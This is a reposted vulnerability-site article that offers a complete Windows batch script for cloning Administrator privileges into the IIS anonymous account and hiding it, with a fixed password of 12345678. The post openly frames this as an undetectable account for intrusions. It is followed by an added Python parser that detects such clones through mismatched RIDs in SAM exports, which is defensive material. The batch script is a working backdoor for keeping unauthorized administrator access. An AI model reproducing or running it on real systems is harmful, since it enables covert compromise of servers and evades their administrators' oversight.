Cloning a truly hidden administrator account (complete batch script) - Vulnerability Alert - Heiba Security Net (黑吧安全网)

ID MYHACK58:62200821419
Type myhack58
Reporter Anonymous (佚名)
Modified 2008-12-10T00:00:00


Many methods and tools circulating online claim to copy administrator privileges into an account, for example creating an account named admin$ (the so-called hidden account) and then giving it administrator rights.

In fact that is only a temporary, one-off hide: once the server comes back up, anyone who opens "Computer Management" (Local Users and Groups) or runs net user can see the account.

The batch script below was written for the server situation at hand, combined with my own research. It uses the server's local IIS anonymous account, IUSR_computername, and sets its password to 12345678 (change it yourself on the last line of the batch).

Copying the administrator rights into this account is hard to spot and does not arouse suspicion.

Of course any other account would do as well; the main advantage of this one is that the machine name alone tells you which account and which password to use for the intrusion.


@echo off
setlocal enabledelayedexpansion
echo %computername%
rem give Administrators and SYSTEM full access to the SAM hive so regedit can export it
echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
rem export the Names\IUSR_<computername> key; the type field of its default value is the account's RID
regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_%computername%
rem unicode ->ascii
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem find the RID of IUSR_%computername% (the line "@=hex(3e9):" leaves "3e9):" in %%b)
for /F "delims=( tokens=1-5 skip=3" %%a in (%windir%\..\2.reg) do set iusr_id=%%b
del /q "%windir%\..\2.reg"
rem export the Administrator key (RID 0x1F4)
regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem replace 1f4 -> iusr_id so the import lands in the IUSR key instead of the Administrator key
for /f "tokens=* delims=:" %%i in (%windir%\..\2.reg) do (
    for /f "tokens=*" %%j in ("%%i") do (
        set TMP=%%j
        set "TMP=!TMP:000001F4=00000%iusr_id:~0,3%!"
        rem redirection first, so the echoed text can never be read as a handle number
        >>"%windir%\..\1.reg" echo !TMP!
    )
)
regedit /s %windir%\..\1.reg
del /q %windir%\..\1.reg
del /q %windir%\..\2.reg
rem put the hive ACL back to SYSTEM full access only
echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
del /q "%windir%\..\1.reg"
net user IUSR_%computername% 12345678
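The tell-tale the script leaves behind, and a check for it, as an added example that is not part of the original post (Python, chosen over a second batch file because the exported .reg text can be copied off the box and inspected anywhere). It parses a regedit /e export of the Users subtree the same way the batch does (the RID lives in the type field of the Names\<user> default value, the "@=hex(3e9):" line), then reads the RID stored at offset 0x30 of each account's F block and compares it with the key name: a cloned account's key is named after its own RID, but the F block it inherited still says 0x1F4. The export text, the machine name WEB01 and the F contents are constructed for the example; only the RID field at 0x30 and the account-control word at 0x38 are filled in.

```python
# Spot cloned SAM accounts in a regedit export of the Users subtree.  A clone
# leaves an inconsistency: the key is named after the account's own RID
# (000003E9 for IUSR_...), but the F block copied from the Administrator key
# still carries RID 0x1F4 at offset 0x30.  Comparing the two exposes it.
import re
import struct

USERS_KEY = r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"
F_RID_OFFSET = 0x30   # little-endian DWORD: the RID this F block was written for
F_ACB_OFFSET = 0x38   # little-endian WORD: account control bits
ACB_DISABLED = 0x0001

# Constructed sample (not from a real machine) in the form regedit /e produces
# once the script's `type` step has turned it into ANSI.  The IUSR_WEB01 key
# (RID 0x3E9) holds a byte-for-byte copy of the Administrator F block.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  f4,01,00,00,00,00,00,00,10,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003E9]
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  f4,01,00,00,00,00,00,00,10,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Administrator]
@=hex(1f4):

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_WEB01]
@=hex(3e9):
"""

_VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=hex(?:\(([0-9a-fA-F]+)\))?:(.*)$')


def parse_reg_export(text):
    """Parse regedit 5.00 text into {key_path: {value_name: (reg_type, data)}}.
    Only hex-typed values are kept (SAM user keys hold nothing else); lines
    regedit split with a trailing backslash are joined again."""
    keys, current, pending = {}, None, None
    for line in text.splitlines():
        line = line.strip()
        if pending is not None:                      # continuation of a hex value
            name, rtype, hexstr = pending
            hexstr += line.rstrip("\\")
            if line.endswith("\\"):
                pending = (name, rtype, hexstr)
            else:
                keys[current][name] = (rtype, bytes.fromhex(hexstr.replace(",", "")))
                pending = None
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m is None or current is None:
            continue                                 # header, blank line or non-hex value
        name = "@" if m.group(1) == "@" else m.group(1)[1:-1]
        rtype = int(m.group(2), 16) if m.group(2) else 3   # bare "hex:" is REG_BINARY (3)
        if m.group(3).endswith("\\"):
            pending = (name, rtype, m.group(3)[:-1])
        else:
            keys[current][name] = (rtype, bytes.fromhex(m.group(3).replace(",", "")))
    return keys


def names_to_rids(keys):
    """Map user name -> RID.  The Names\\<user> default value carries no data;
    its *type* field is the RID, which is what the batch script scrapes from
    the '@=hex(3e9):' line."""
    prefix = USERS_KEY + "\\Names\\"
    return {path[len(prefix):]: vals["@"][0]
            for path, vals in keys.items() if path.startswith(prefix) and "@" in vals}


def find_cloned_accounts(keys):
    """Return {key_rid: (rid_in_F, acb_flags, is_clone)} for every Users\\<RID> key."""
    report = {}
    for path, vals in keys.items():
        parent, _, tail = path.rpartition("\\")
        if parent != USERS_KEY or "F" not in vals or not re.fullmatch(r"[0-9A-Fa-f]{8}", tail):
            continue
        f = vals["F"][1]
        if len(f) < F_ACB_OFFSET + 2:
            continue                                 # truncated F block, nothing to compare
        key_rid = int(tail, 16)
        f_rid = struct.unpack_from("<I", f, F_RID_OFFSET)[0]
        acb = struct.unpack_from("<H", f, F_ACB_OFFSET)[0]
        report[key_rid] = (f_rid, acb, f_rid != key_rid)
    return report


if __name__ == "__main__":
    keys = parse_reg_export(SAMPLE_REG)
    by_rid = {rid: name for name, rid in names_to_rids(keys).items()}
    for key_rid, (f_rid, acb, clone) in sorted(find_cloned_accounts(keys).items()):
        state = "disabled" if acb & ACB_DISABLED else "enabled"
        verdict = f"CLONE of RID {f_rid:#x}" if clone else "consistent"
        print(f"{by_rid.get(key_rid, '?'):<16} {key_rid:08X}  F.rid={f_rid:#06x}  {state}  {verdict}")
```

On a live system the same comparison can be made against the hive directly, but reading HKLM\SAM needs SYSTEM (or the ACL change the script itself performs with regini); exporting the Users subtree with regedit /e after that change and feeding the file to this parser gives the same result, and the account-control word at 0x38 is read as well so that a clone that was also left disabled is not overlooked.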


Reposted from: it_security